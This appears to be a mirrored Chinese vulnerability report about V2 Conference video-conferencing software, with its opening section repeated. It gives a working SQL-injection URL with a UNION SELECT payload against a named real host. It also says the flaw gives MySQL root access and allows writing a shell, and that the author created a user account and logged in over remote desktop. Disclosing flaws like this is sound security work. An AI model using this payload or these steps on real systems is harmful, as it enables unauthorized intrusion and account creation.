VULHUB ™

### 简要描述： ### 详细说明： 第三方会议系统，V2 Conference. 见: [WooYun: V2视频会议系统某处SQL注射、XXE漏洞(可getshell)](http://www.wooyun.org/bugs/wooyun-2015-0143276) ### 漏洞证明： ``` http://zuyong.v2tech.com/Conf/jsp/systembulletin/bulletinAction.do?operator=details&sysId=-1%20union%20select%201,user%28%29,3,version%28%29,5%23 ``` [<img src="https://images.seebug.org/upload/201604/12164230d38d7e4e395a7258145cbac757bfe864.png" alt="11111.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201604/12164230d38d7e4e395a7258145cbac757bfe864.png) mysql root权限注入，可写shell. [<img src="https://images.seebug.org/upload/201604/121644496e0edaa4fb486c9a317b2576d4551801.png" alt="22222.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201604/121644496e0edaa4fb486c9a317b2576d4551801.png) [<img src="https://images.seebug.org/upload/201604/1216455668a95c433e1c506dd126111ff74b107d.png" alt="33333.png" width="600"...

### 简要描述： ### 详细说明： 第三方会议系统，V2 Conference. 见: [WooYun: V2视频会议系统某处SQL注射、XXE漏洞(可getshell)](http://www.wooyun.org/bugs/wooyun-2015-0143276) ### 漏洞证明： ``` http://zuyong.v2tech.com/Conf/jsp/systembulletin/bulletinAction.do?operator=details&sysId=-1%20union%20select%201,user%28%29,3,version%28%29,5%23 ``` [<img src="https://images.seebug.org/upload/201604/12164230d38d7e4e395a7258145cbac757bfe864.png" alt="11111.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201604/12164230d38d7e4e395a7258145cbac757bfe864.png) mysql root权限注入，可写shell. [<img src="https://images.seebug.org/upload/201604/121644496e0edaa4fb486c9a317b2576d4551801.png" alt="22222.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201604/121644496e0edaa4fb486c9a317b2576d4551801.png) [<img src="https://images.seebug.org/upload/201604/1216455668a95c433e1c506dd126111ff74b107d.png" alt="33333.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201604/1216455668a95c433e1c506dd126111ff74b107d.png) 查看远程桌面端口：39556 [<img src="https://images.seebug.org/upload/201604/121650087bd9b68386fa025e0346de75d034fb16.png" alt="44444.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201604/121650087bd9b68386fa025e0346de75d034fb16.png) 创建了wooyun用户，连接远程桌面： [<img src="https://images.seebug.org/upload/201604/121651524d1dc359ba715039e8533b08890c66be.png" alt="55555.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201604/121651524d1dc359ba715039e8533b08890c66be.png) 连接远程后发现已经有人来过： [<img src="https://images.seebug.org/upload/201604/12165517449f9b531df43ab7c558d51d58f58d99.png" alt="66666.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201604/12165517449f9b531df43ab7c558d51d58f58d99.png) 发现大黑客传了大量黑阔工具： [<img src="https://images.seebug.org/upload/201604/12171111c02083548859e1c6bc1071820a531228.png" alt="77777.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201604/12171111c02083548859e1c6bc1071820a531228.png)